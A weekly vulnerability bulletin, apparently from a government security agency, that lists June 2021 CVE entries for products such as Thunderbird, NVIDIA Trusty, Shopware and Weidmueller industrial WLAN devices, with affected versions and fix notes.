mozilla — thunderbird
 
OpenPGP secret keys that were imported using Thunderbird version 78.8.1 up to version 78.10.1 were stored unencrypted on the user’s local disk. The master password protection was inactive for those keys. Version 78.10.2 will restore the protection mechanism for newly imported keys, and will automatically protect keys that had been imported using affected Thunderbird versions. This vulnerability affects Thunderbird < 78.10.2. 2021-06-24 not yet calculated CVE-2021-29956
MISC
MISC
mozilla — thunderbird
 
If a MIME encoded email contains an OpenPGP inline signed or encrypted message part, but also contains an additional unprotected part, Thunderbird did not indicate that only parts of the message are protected. This vulnerability affects Thunderbird < 78.10.2. 2021-06-24 not yet calculated CVE-2021-29957
MISC
MISC
mozilla — thunderbird
 
If a Thunderbird user has previously imported Alice’s OpenPGP key, and Alice has extended the validity period of her key, but Alice’s updated key has not yet been imported, an attacker may send an email containing a crafted version of Alice’s key with an invalid subkey, Thunderbird might subsequently attempt to use the invalid subkey, and will fail to send encrypted email to Alice. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-23991
MISC
MISC
mozilla — thunderbird
 
When loading the shared library that provides the OTR protocol implementation, Thunderbird will initially attempt to open it using a filename that isn’t distributed by Thunderbird. If a computer has already been infected with a malicious library of the alternative filename, and the malicious library has been copied to a directory that is contained in the search path for executable libraries, then Thunderbird will load the incorrect library. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-29949
MISC
MISC
mozilla — thunderbird_ firefox_and_firefox_esr
 
A locally-installed hostile program could send `WM_COPYDATA` messages that Firefox would process incorrectly, leading to an out-of-bounds read. *This bug only affects Firefox on Windows. Other operating systems are unaffected.*. This vulnerability affects Thunderbird < 78.11, Firefox < 89, and Firefox ESR < 78.11. 2021-06-24 not yet calculated CVE-2021-29964
MISC
MISC
MISC
MISC
mozilla — thunderbird_firefox_and_firefox_esr
 
The Mozilla Maintenance Service granted SERVICE_START access to BUILTIN|Users which, in a domain network, grants normal remote users access to start or stop the service. This could be used to prevent the browser update service from operating (if an attacker spammed the ‘Stop’ command); but also exposed attack surface in the maintenance service. *Note: This issue only affected Windows operating systems older than Win 10 build 1709. Other operating systems are unaffected.*. This vulnerability affects Thunderbird < 78.10.1, Firefox < 87, and Firefox ESR < 78.10.1. 2021-06-24 not yet calculated CVE-2021-29951
MISC
MISC
MISC
MISC
msi_dragon_center — msi_dragon_center
 
MODAPI.sys in MSI Dragon Center 2.0.104.0 allows low-privileged users to access kernel memory and potentially escalate privileges via a crafted IOCTL 0x9c406104 call. This IOCTL provides the MmMapIoSpace feature for mapping physical memory. 2021-06-21 not yet calculated CVE-2021-29337
MISC
myq_x_smart — myq_server
 
MyQ Server in MyQ X Smart before 8.2 allows remote code execution by unprivileged users because administrative session data can be read in the %PROGRAMFILES%MyQPHPSessions directory. The “Select server file” feature is only intended for administrators but actually does not require authorization. An attacker can inject arbitrary OS commands (such as commands to create new .php files) via the Task Scheduler component. 2021-06-21 not yet calculated CVE-2021-31769
MISC
neos — form
 
neos/forms is an open source framework to build web forms. By crafting a special `GET` request containing a valid form state, a form can be submitted without invoking any validators. Form state is secured with an HMAC that is still verified. That means that this issue can only be exploited if Form Finishers cause side effects even if no form values have been sent. Form Finishers can be adjusted in a way that they only execute an action if the submitted form contains some expected data. Alternatively a custom Finisher can be added as first finisher. This regression was introduced with github.com/neos/form/commit/049d415295be8d4a0478ccba97dba1bb81649567 2021-06-21 not yet calculated CVE-2021-32697
MISC
MISC
MISC
CONFIRM
MISC
nvidia — geforce_experience
 
NVIDIA GeForce Experience, all versions prior to 3.23, contains a vulnerability where, if a user clicks on a maliciously formatted link that opens the GeForce Experience login page in a new browser tab instead of the GeForce Experience application and enters their login information, the malicious site can get access to the token of the user login session. Such an attack may lead to these targeted users’ data being accessed, altered, or lost. 2021-06-25 not yet calculated CVE-2021-1073
CONFIRM
nvidia — nvidia_mb2
 
Bootloader contains a vulnerability in NVIDIA MB2, which may cause free-the-wrong-heap, which may lead to limited denial of service. 2021-06-22 not yet calculated CVE-2021-34397
CONFIRM
nvidia — nvidia_mb2
 
Bootloader contains a vulnerability in access permission settings where unauthorized software may be able to overwrite NVIDIA MB2 code, which would result in limited denial of service. 2021-06-22 not yet calculated CVE-2021-34396
CONFIRM
nvidia — trusty
 
Trusty (the trusted OS produced by NVIDIA for Jetson devices) driver contains a vulnerability in the NVIDIA OTE protocol message parsing code where an integer overflow in a malloc() size calculation leads to a buffer overflow on the heap, which might result in information disclosure, escalation of privileges, and denial of service. 2021-06-22 not yet calculated CVE-2021-34372
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel function where a lack of checks allows the exploitation of an integer overflow on the size parameter of the tz_map_shared_mem function. 2021-06-22 not yet calculated CVE-2021-34390
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel�s tz_handle_trusted_app_smc function where a lack of integer overflow checks on the req_off and param_ofs variables leads to memory corruption of critical kernel structures. 2021-06-22 not yet calculated CVE-2021-34391
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the tz_map_shared_mem function can bypass boundary checks, which might lead to denial of service. 2021-06-22 not yet calculated CVE-2021-34392
CONFIRM
nvidia — trusty
 
Trusty contains a vulnerability in TSEC TA which deserializes the incoming messages even though the TSEC TA does not expose any command. This vulnerability might allow an attacker to exploit the deserializer to impact code execution, causing information disclosure. 2021-06-22 not yet calculated CVE-2021-34393
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the calloc size calculation can cause the multiplication of count and size can overflow, which might lead to heap overflows. 2021-06-21 not yet calculated CVE-2021-34386
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in its access permission settings where it does not properly restrict access to a resource from a user with local privileges, which might lead to limited information disclosure and limited denial of service. 2021-06-22 not yet calculated CVE-2021-34395
CONFIRM
nvidia — trusty
 
The ARM TrustZone Technology on which Trusty is based on contains a vulnerability in access permission settings where the portion of the DRAM reserved for TrustZone is identity-mapped by TLK with read, write, and execute permissions, which gives write access to kernel code and data that is otherwise mapped read only. 2021-06-21 not yet calculated CVE-2021-34387
CONFIRM
nvidia — trusty
 
Trusty contains a vulnerability in all TAs whose deserializer does not reject messages with multiple occurrences of the same parameter. The deserialization of untrusted data might allow an attacker to exploit the deserializer to impact code execution. 2021-06-22 not yet calculated CVE-2021-34394
CONFIRM
nvidia — trusty
 
Trusty contains a vulnerability in NVIDIA OTE protocol message parsing code, which is present in all the TAs. An incorrect bounds check leads to a memory leak of a portion of the heap situated after a stream buffer. 2021-06-21 not yet calculated CVE-2021-34389
CONFIRM
openemer — openemr
 
In OpenEMR, versions 5.0.0 to 6.0.0.1 are vulnerable to weak password requirements as it does not enforce a maximum password length limit. If a malicious user is aware of the first 72 characters of the victim user’s password, he can leverage it to an account takeover. 2021-06-24 not yet calculated CVE-2021-25923
MISC
MISC
opengrok — opengrok
 
Vulnerability in OpenGrok (component: Web App). Versions that are affected are 1.6.7 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise OpenGrok. Successful attacks of this vulnerability can result in takeover of OpenGrok. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). 2021-06-23 not yet calculated CVE-2021-2322
MISC
oracle — glassfish_server
 
** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2021-06-25 not yet calculated CVE-2021-3314
MISC
ory — oathkeeper
 
ORY Oathkeeper is an Identity & Access Proxy (IAP) and Access Control Decision API that authorizes HTTP requests based on sets of Access Rules. When you make a request to an endpoint that requires the scope `foo` using an access token granted with that `foo` scope, introspection will be valid and that token will be cached. The problem comes when a second requests to an endpoint that requires the scope `bar` is made before the cache has expired. Whether the token is granted or not to the `bar` scope, introspection will be valid. A patch will be released with `v0.38.12-beta.1`. Per default, caching is disabled for the `oauth2_introspection` authenticator. When caching is disabled, this vulnerability does not exist. The cache is checked in [`func (a *AuthenticatorOAuth2Introspection) Authenticate(…)`](github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L152). From [`tokenFromCache()`](github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L97) it seems that it only validates the token expiration date, but ignores whether the token has or not the proper scopes. The vulnerability was introduced in PR #424. During review, we failed to require appropriate test coverage by the submitter which is the primary reason that the vulnerability passed the review process. 2021-06-22 not yet calculated CVE-2021-32701
MISC
MISC
CONFIRM
palot_alto_networks — cortex_xsoar
 
An improper authorization vulnerability in Palo Alto Networks Cortex XSOAR enables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API. This issue impacts: Cortex XSOAR 6.1.0 builds later than 1016923 and earlier than 1271064; Cortex XSOAR 6.2.0 builds earlier than 1271065. This issue does not impact Cortex XSOAR 5.5.0, Cortex XSOAR 6.0.0, Cortex XSOAR 6.0.1, or Cortex XSOAR 6.0.2 versions. All Cortex XSOAR instances hosted by Palo Alto Networks are upgraded to resolve this vulnerability. No additional action is required for these instances. 2021-06-22 not yet calculated CVE-2021-3044
MISC
pam_setquota.c — pam_setquota.c
 
pam_setquota.c in the pam_setquota module before 2020-05-29 for Linux-PAM allows local attackers to set their quota on an arbitrary filesystem, in certain situations where the attacker’s home directory is a FUSE filesystem mounted under /home. 2021-06-22 not yet calculated CVE-2020-36394
MISC
pandorafms — pandorafms
 
PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed. 2021-06-25 not yet calculated CVE-2021-35501
MISC
pandorafms — pandorafms
 
PandoraFMS <=7.54 allows arbitrary file upload, it leading to remote command execution via the File Manager. To bypass the built-in protection, a relative path is used in the requests. 2021-06-25 not yet calculated CVE-2021-34074
MISC
phoenix_contact — axl_f_bk_and_il__bk_products
 
In certain devices of the Phoenix Contact AXL F BK and IL BK product families an undocumented password protected FTP access to the root directory exists. 2021-06-25 not yet calculated CVE-2021-33540
CONFIRM
phoenix_contact — classic_automation_worx_software_suite
 
Phoenix Contact Classic Automation Worx Software Suite in Version 1.87 and below is affected by a remote code execution vulnerability. Manipulated PC Worx or Config+ projects could lead to a remote code execution when unallocated memory is freed because of incompletely initialized data. The attacker needs to get access to an original bus configuration file (*.bcp) to be able to manipulate data inside. After manipulation the attacker needs to exchange the original file by the manipulated one on the application programming workstation. Availability, integrity, or confidentiality of an application programming workstation might be compromised by attacks using these vulnerabilities. Automated systems in operation which were programmed with one of the above-mentioned products are not affected. 2021-06-25 not yet calculated CVE-2021-33542
CONFIRM
phoenix_contact — classic_line_controllers
 
Phoenix Contact Classic Line Controllers ILC1x0 and ILC1x1 in all versions/variants are affected by a Denial-of-Service vulnerability. The communication protocols and device access do not feature authentication measures. Remote attackers can use specially crafted IP packets to cause a denial of service on the PLC’s network communication module. A successful attack stops all network communication. To restore the network connectivity the device needs to be restarted. The automation task is not affected. 2021-06-25 not yet calculated CVE-2021-33541
CONFIRM
phoenix_contact — fl_comserver_uni
 
In Phoenix Contact FL COMSERVER UNI in versions < 2.40 a invalid Modbus exception response can lead to a temporary denial of service. 2021-06-25 not yet calculated CVE-2021-21002
CONFIRM
phoenix_contact — fl_switch_smcs
 
In Phoenix Contact FL SWITCH SMCS series products in multiple versions fragmented TCP-Packets may cause a Denial of Service of Web-, SNMP- and ICMP-Echo services. The switching functionality of the device is not affected. 2021-06-25 not yet calculated CVE-2021-21003
CONFIRM
phoenix_contact — fl_switch_smcs
 
In Phoenix Contact FL SWITCH SMCS series products in multiple versions an attacker may insert malicious code via LLDP frames into the web-based management which could then be executed by the client. 2021-06-25 not yet calculated CVE-2021-21004
CONFIRM
phoenix_contact — fl_switch_smcs
 
In Phoenix Contact FL SWITCH SMCS series products in multiple versions if an attacker sends a hand-crafted TCP-Packet with the Urgent-Flag set and the Urgent-Pointer set to 0, the network stack will crash. The device needs to be rebooted afterwards. 2021-06-25 not yet calculated CVE-2021-21005
CONFIRM
phpwcms — phpwcms
 
phpwcms 1.9.13 is vulnerable to Code Injection via /phpwcms/setup/setup.php. 2021-06-24 not yet calculated CVE-2020-21784
MISC
pterodactyl — wings
 
Wings is the control plane software for the open source Pterodactyl game management system. All versions of Pterodactyl Wings prior to `1.4.4` are vulnerable to system resource exhaustion due to improper container process limits being defined. A malicious user can consume more resources than intended and cause downstream impacts to other clients on the same hardware, eventually causing the physical server to stop responding. Users should upgrade to `1.4.4` to mitigate the issue. There is no non-code based workaround for impacted versions of the software. Users running customized versions of this software can manually set a PID limit for containers created. 2021-06-22 not yet calculated CVE-2021-32699
MISC
CONFIRM
qnap — qnap_nas
 
A command injection vulnerability has been reported to affect QNAP NAS running legacy versions of QTS. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. This issue affects: QNAP Systems Inc. QTS versions prior to 4.3.6.1663 Build 20210504; versions prior to 4.3.3.1624 Build 20210416. This issue does not affect: QNAP Systems Inc. QTS 4.5.3. QNAP Systems Inc. QuTS hero h4.5.3. QNAP Systems Inc. QuTScloud c4.5.5. 2021-06-24 not yet calculated CVE-2021-28800
MISC
react-bootstrap-table — react-bootstrap-table
 
All versions of package react-bootstrap-table are vulnerable to Cross-site Scripting (XSS) via the dataFormat parameter. The problem is triggered when an invalid React element is returned, leading to dangerouslySetInnerHTML being used, which does not sanitize the output. 2021-06-24 not yet calculated CVE-2021-23398
CONFIRM
CONFIRM
CONFIRM
CONFIRM
report_portal — report_portal
 
Report portal is an open source reporting and analysis framework. Starting from version 3.1.0 of the service-api XML parsing was introduced. Unfortunately the XML parser was not configured properly to prevent XML external entity (XXE) attacks. This allows a user to import a specifically-crafted XML file which imports external Document Type Definition (DTD) file with external entities for extraction of secrets from Report Portal service-api module or server-side request forgery. This will be resolved in the 5.4.0 release. 2021-06-23 not yet calculated CVE-2021-29620
MISC
CONFIRM
MISC
roundcube — roundcube_mail
 
Cross Site Scripting (XSS) vulneraibility in Roundcube mail .4.4 via database host and user in /installer/test.php. 2021-06-24 not yet calculated CVE-2020-18670
MISC
MISC
MISC
roundcube — roundcube_mail
 
Cross Site Scripting (XSS) vulnerability in Roundcube Mail <=1.4.4 via smtp config in /installer/test.php. 2021-06-24 not yet calculated CVE-2020-18671
MISC
MISC
MISC
ruby_on_rails — ruby_on_rails
 
In the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example BinData::Bit100000, BinData::Bit100001, BinData::Bit100002, BinData::Bit<N>. In combination with <user_input>.constantize there is a potential for a CPU-based DoS. In version 2.4.10 bindata improved the creation time of Bits and Integers. 2021-06-24 not yet calculated CVE-2021-32823
MISC
MISC
CONFIRM
MISC
MISC
sas — environment_manager
 
SAS Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties. 2021-06-25 not yet calculated CVE-2021-35475
MISC
MISC
shopware — shopware
 
Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 the admin api has exposed some internal hidden fields when an association has been loaded with a to many reference. Users are recommend to update to version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. 2021-06-24 not yet calculated CVE-2021-32716
MISC
MISC
CONFIRM
shopware — shopware
 
Shopware is an open source eCommerce platform. Versions prior to 5.6.10 are vulnerable to system information leakage in error handling. Users are recommend to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. 2021-06-24 not yet calculated CVE-2021-32712
MISC
MISC
CONFIRM
shopware — shopware
 
Shopware is an open source eCommerce platform. Versions prior to 6.3.5.1 may leak of information via Store-API. The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. We recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview. www.shopware.com/en/download/#shopware-6 The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. Please check your plugins if you have it in use. Detailed technical information can be found in the upgrade information. github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351 ### Workarounds For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 ### For more information docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021 2021-06-24 not yet calculated CVE-2021-32711
MISC
MISC
CONFIRM
shopware — shopware
 
Shopware is an open source eCommerce platform. Potential session hijacking of store customers in versions below 6.3.5.2. We recommend to update to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. 2021-06-24 not yet calculated CVE-2021-32710
CONFIRM
MISC
shopware — shopware
 
Shopware is an open source eCommerce platform. Creation of order credits was not validated by ACL in admin orders. Users are recommend to update to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. 2021-06-24 not yet calculated CVE-2021-32709
CONFIRM
shopware — shopware
 
Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 private files publicly accessible with Cloud Storage providers when the hashed URL is known. Users are recommend to first change their configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`. When the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html. Otherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities. 2021-06-24 not yet calculated CVE-2021-32717
MISC
CONFIRM
MISC
shopware — shopware
 
Shopware is an open source eCommerce platform. Versions prior to 5.6.10 suffer from an authenticated stored XSS in administration vulnerability. Users are recommend to update to the version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. 2021-06-24 not yet calculated CVE-2021-32713
CONFIRM
MISC
MISC
sonicwall — sonicos
 
A vulnerability in SonicOS where the HTTP server response leaks partial memory by sending a crafted HTTP request, this can potentially lead to an internal sensitive data disclosure vulnerability. 2021-06-23 not yet calculated CVE-2021-20019
CONFIRM
synology — disktation_manager
 
Use after free vulnerability in file transfer protocol component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to execute arbitrary code via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-27649
CONFIRM
synology — synology_diskstation_manager
 
Improper limitation of a pathname to a restricted directory (‘Path Traversal’) vulnerability in webapi component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to write arbitrary files via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29087
CONFIRM
synology — synology_diskstation_manager
 
Exposure of sensitive information to an unauthorized actor vulnerability in webapi component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to obtain sensitive information via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29086
CONFIRM
synology — synology_diskstation_manager
 
Improper neutralization of special elements in output used by a downstream component (‘Injection’) vulnerability in file sharing management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29085
CONFIRM
synology — synology_diskstation_manager
 
Improper neutralization of special elements in output used by a downstream component (‘Injection’) vulnerability in Security Advisor report management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29084
CONFIRM
tripplite — tripplite_su2200rtxl2ua
 
A stored cross-site scripting (XSS) vulnerability was discovered in /Forms/device_vars_1 on TrippLite SU2200RTXL2Ua with firmware version 12.04.0055. This vulnerability allows authenticated attackers to obtain other users’ information via a crafted POST request. 2021-06-25 not yet calculated CVE-2020-26801
MISC
MISC
MISC
tsmuxer — tsmuxer
 
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34067
MISC
CONFIRM
tsmuxer — tsmuxer
 
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34068
CONFIRM
MISC
tsmuxer — tsmuxer
 
Divide-by-zero bug in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34069
MISC
CONFIRM
tsmuxer — tsmuxer
 
Out-of-bounds Read in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34070
CONFIRM
MISC
tsmuxer — tsmuxer
 
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34071
CONFIRM
ubuntu — gfs2
 
A flaw was discovered in gfs2 file system’s handling of acls (access control lists). An unprivileged local attacker could exploit this flaw to gain access or execute any file stored in the gfs2 file system. 2021-06-22 not yet calculated CVE-2010-2525
MISC
MISC
vaadin — flow
 
URL encoding error in development mode handler in com.vaadin:flow-server versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser. 2021-06-24 not yet calculated CVE-2021-33604
CONFIRM
CONFIRM
vaadin — flow
 
Improper sanitization of path in default RouteNotFoundError view in com.vaadin:flow-server versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows network attacker to enumerate all available routes via crafted HTTP request when application is running in production mode and no custom handler for NotFoundException is provided. 2021-06-24 not yet calculated CVE-2021-31412
CONFIRM
CONFIRM
vmware — carbon_black_app_control
 
VMware Carbon Black App Control 8.0, 8.1, 8.5 prior to 8.5.8, and 8.6 prior to 8.6.2 has an authentication bypass. A malicious actor with network access to the VMware Carbon Black App Control management server might be able to obtain administrative access to the product without the need to authenticate. 2021-06-23 not yet calculated CVE-2021-21998
MISC
vmware — multiple_products
 
VMware Tools for Windows (11.x.y prior to 11.2.6), VMware Remote Console for Windows (12.x prior to 12.0.1) , VMware App Volumes (2.x prior to 2.18.10 and 4 prior to 2103) contain a local privilege escalation vulnerability. An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as `openssl.cnf’ in an unrestricted directory which would allow code to be executed with elevated privileges. 2021-06-23 not yet calculated CVE-2021-21999
MISC
MISC
webport — webport
 
Cross Site Scripting (XSS) vulnerability in WebPort <=1.19.1via the connection name parameter in type-conn. 2021-06-24 not yet calculated CVE-2020-18664
MISC
MISC
webport — webport
 
Directory Traversal vulnerability in WebPort <=1.19.1 in tags of system settings. 2021-06-24 not yet calculated CVE-2020-18665
MISC
MISC
webport — webport
 
SQL Injection vulnerability in WebPort <=1.19.1 via the new connection, parameter name in type-conn. 2021-06-24 not yet calculated CVE-2020-18667
MISC
MISC
webport– webport
 
Cross Site Scripting (XSS) vulnerabililty in WebPort <=1.19.1 via the description parameter to script/listcalls. 2021-06-24 not yet calculated CVE-2020-18668
MISC
MISC
weidmueller — industrial_wlan_devices In Weidmueller Industrial WLAN devices in multiple versions an exploitable privilege escalation vulnerability exists in the iw_console functionality. A specially crafted menu selection string can cause an escape from the restricted console, resulting in system access as the root user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33528
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted diagnostic script file name can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33532
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable denial-of-service vulnerability exists in ServiceAgent functionality. A specially crafted packet can cause an integer underflow, triggering a large memcpy that will access unmapped or out-of-bounds memory. An attacker can send this packet while unauthenticated to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33536
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted iw_serverip parameter can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33533
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the hostname functionality. A specially crafted entry to network configuration information can cause execution of arbitrary system commands, resulting in full control of the device. An attacker can send various authenticated requests to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33534
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable format string vulnerability exists in the iw_console conio_writestr functionality. A specially crafted time server entry can cause an overflow of the time server buffer, resulting in remote code execution. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33535
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in encrypted diagnostic script functionality of the devices. A specially crafted diagnostic script file can cause arbitrary busybox commands to be executed, resulting in remote control over the device. An attacker can send diagnostic while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33530
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable remote code execution vulnerability exists in the iw_webs configuration parsing functionality. A specially crafted user name entry can cause an overflow of an error message buffer, resulting in remote code execution. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33537
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable improper access control vulnerability exists in the iw_webs account settings functionality. A specially crafted user name entry can cause the overwrite of an existing user account password, resulting in remote shell access to the device as that user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33538
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable authentication bypass vulnerability exists in the hostname processing. A specially configured device hostname can cause the device to interpret selected remote traffic as local traffic, resulting in a bypass of web authentication. An attacker can send authenticated SNMP requests to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33539
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions the usage of hard-coded cryptographic keys within the service agent binary allows for the decryption of captured traffic across the network from or to the device. 2021-06-25 not yet calculated CVE-2021-33529
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable use of hard-coded credentials vulnerability exists in multiple iw_* utilities. The device operating system contains an undocumented encryption password, allowing for the creation of custom diagnostic scripts. An attacker can send diagnostic scripts while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33531
CONFIRM
weseek — growi
 
NoSQL injection vulnerability in GROWI versions prior to v4.2.20 allows a remote attacker to obtain and/or alter the information stored in the database via unspecified vectors. 2021-06-22 not yet calculated CVE-2021-20736
MISC
MISC
weseek — growi
 
Improper authentication vulnerability in GROWI versions prior to v4.2.20 allows a remote attacker to view the unauthorized pages without access privileges via unspecified vectors. 2021-06-22 not yet calculated CVE-2021-20737
MISC
MISC
wordpress — wordpress
 
The Comments Like Dislike WordPress plugin before 1.1.4 allows users to like/dislike posted comments, however does not prevent them from replaying the AJAX request to add a like. This allows any user (even unauthenticated) to add unlimited like/dislike to any comment. The plugin appears to have some Restriction modes, such as Cookie Restriction, IP Restrictions, Logged In User Restriction, however, they do not prevent such attack as they only check client side 2021-06-21 not yet calculated CVE-2021-24379
CONFIRM
zoho — manageengine_adselfservice_plus
 
Zoho ManageEngine ADSelfService Plus through 6101 is vulnerable to unauthenticated Remote Code Execution while changing the password. 2021-06-25 not yet calculated CVE-2021-28958
MISC
MISC
zte — smart_stb_product
 
A smart STB product of ZTE is impacted by a permission and access control vulnerability. Due to insufficient protection of system application, attackers could use this vulnerability to tamper with the system desktop and affect system customization functions. This affects: ZXV10 B860H V5.0, V83011303.0010, V83011303.0016 2021-06-24 not yet calculated CVE-2021-21737
MISC

Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Citrix Releases Security Updates for Hypervisor

06/25/2021 06:39 AM EDT

Original release date: June 25, 2021

